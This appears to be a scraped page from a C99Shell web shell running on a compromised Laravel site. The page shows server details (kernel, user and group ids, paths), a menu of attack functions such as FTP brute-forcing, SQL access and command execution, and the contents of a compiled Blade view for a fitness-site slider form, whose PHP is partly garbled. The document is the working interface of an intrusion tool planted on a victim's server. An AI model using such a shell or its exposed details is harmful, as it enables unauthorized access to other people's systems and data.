!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/fitness.picotech.app/public_html/storage/framework/views/   drwxrwxr-x
Free 26.87 GB of 117.98 GB (22.78%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     28fbdcfc67e69d62de01aac176157477.php (5.91 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

$slider_details
=$slider_details;
$slider_detail=isset($slider_details[0])?json_decode($slider_details[0]->value):'';

?>


<div class="row">
    <div class="col-md-12 slider-section">
        <div class="card">
            <div class="card-header">
                <h5>Slider Section</h5>
            </div>
            <div class="card-body">
                <div class="row">
                    <div class="form-group col-md-6">
                        <label for=""><?php echo e(trans('Title')); ?> <span class="text-danger">*</span></label>
                        <input type="text" class="form-control" value="<?php echo e(isset($slider_detail->title)?$slider_detail->title:''); ?>" name="slider_title[]">
                    </div>

                    <div class="form-group col-md-6">
                        <label for=""><?php echo e(trans('Value')); ?></label>
                        <input type="text" class="form-control" value="<?php echo e(isset($slider_detail->value)?$slider_detail->value:''); ?>" name="slider_value[]">
                    </div>

                    <div class="form-group col-md-6 mt-3">
                        <label for=""><?php echo e(trans('Text Title')); ?></label>
                        <input type="text" class="form-control" value="<?php echo e(isset($slider_detail->text_title)?$slider_detail->text_title:''); ?>" name="text_title[]">
                    </div>

                    <div class="form-group col-md-6 mt-3">
                        <label for=""><?php echo e(trans('Text Description')); ?></label>
                        <input type="text" class="form-control" value="<?php echo e(isset($slider_detail->text_description)?$slider_detail->text_description:''); ?>" name="text_description[]">
                    </div>

                    <div class="form-group col-md-12 <?php echo e(isset($step) && $step->design=='design_eight'?'d-none':''); ?>">
                        <label for=""><?php echo e(trans('Image')); ?></label>
                        <?php if(isset($slider_detail->image) && $slider_detail->image && file_existspublic_path().'/uploads/'.$slider_detail->image)): ?>
                        <input type="hidden" class="form-control p-1" value="<?php echo e($slider_detail->image); ?>"  name="pre_slider_image[]">
                        <?php endif; ?>

                        <input type="file" class="form-control p-1" name="slider_image[]">
                    </div>

                </div>

                <div class="form-group text-right justify-content-end">
                    <button class="btn btn-success btn-sm add_slider" type="button">
                        <i class="fa fa-plus"></i>
                    </button>
                </div>

            </div>
        </div>


        <?php if(isset($step) && $step->step_details): ?>
        <?php $slider_step_counter=9999?>
            <?php $__currentLoopData $slider_details$__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key=>$s_detail): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
            <?php if($key !='0'): ?>
            <?php $slider_step_counter++; $values=$s_detail->value?json_decode($s_detail->value):''?>
            <div class="card mt-2" id="slider_append_<?php echo e($slider_step_counter); ?>">
                <div class="card-body">
                    <button class="btn-danger btn-sm float-right delete_slider_append" data-id="<?php echo e($slider_step_counter); ?>" type="button">  <i class="fa fa-trash"></i>  </button>
                    <div class="row">
                        <div class="form-group col-md-6">
                            <label for=""><?php echo e(trans('Title')); ?> <span class="text-danger">*</span></label>
                            <input type="text" class="form-control" value="<?php echo e(isset($values->title)?$values->title:''); ?>" name="slider_title[]">
                        </div>

                        <div class="form-group col-md-6">
                             <label for=""><?php echo e(trans('Value')); ?></label>
                             <input type="text" class="form-control" value="<?php echo e(isset($values->value)?$values->value:''); ?>" name="slider_value[]">
                        </div>

                        <div class="form-group col-md-6 mt-3">
                            <label for=""><?php echo e(trans('Text Title')); ?></label>
                            <input type="text" class="form-control" value="<?php echo e(isset($values->text_title)?$values->text_title:''); ?>" name="text_title[]">
                        </div>

                        <div class="form-group col-md-6 mt-3">
                            <label for=""><?php echo e(trans('Text Description')); ?></label>
                            <input type="text" class="form-control" value="<?php echo e(isset($values->text_description)?$values->text_description:''); ?>" name="text_description[]">
                        </div>

                        <div class="form-group col-md-12 <?php echo e(isset($step) && $step->design=='design_eight'?'d-none':''); ?>">
                            <label for=""><?php echo e(trans('Image')); ?></label>
                            <?php if(isset($values->image) && $values->image && file_existspublic_path().'/uploads/'.$values->image)): ?>
                            <input type="hidden" class="form-control p-1" value="<?php echo e($values->image); ?>" name="pre_slider_image[]">
                            <?php endif; ?>

                            <input type="file" class="form-control p-1" name="slider_image[]">
                        </div>
                    </div>
                </div>
            </div>
            <?php endif; ?>
            <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
        <?php endif; ?>
    </div>
</div>
<?php /**PATH /home/picotech/domains/fitness.picotech.app/public_html/resources/views/admin/step/partial/design_two.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0044 ]--